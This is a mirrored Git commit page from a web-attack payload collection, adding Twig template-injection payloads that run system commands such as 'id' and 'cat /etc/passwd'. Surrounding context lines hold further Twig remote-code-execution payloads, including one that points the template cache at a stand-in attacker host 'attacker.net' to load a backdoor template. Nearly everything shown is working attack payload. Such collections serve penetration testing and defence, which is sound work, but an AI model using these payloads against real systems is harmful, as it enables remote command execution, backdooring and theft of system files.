mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 08:54:40 +01:00
Added filter(system) twig RCE
This commit is contained in:
parent
231e41a59b
commit
8b78c2fe71
1 changed files with 2 additions and 0 deletions
|
|
@ -157,6 +157,8 @@ $output = $twig > render (
|
|||
{{self}}
|
||||
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
|
||||
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
||||
{{['id']|filter('system')}}
|
||||
{{['cat\x20/etc/passwd']|filter('system')}}
|
||||
```
|
||||
|
||||
Example with an email passing FILTER_VALIDATE_EMAIL PHP.
|
||||
|
|
|
|||
Loading…
Reference in a new issue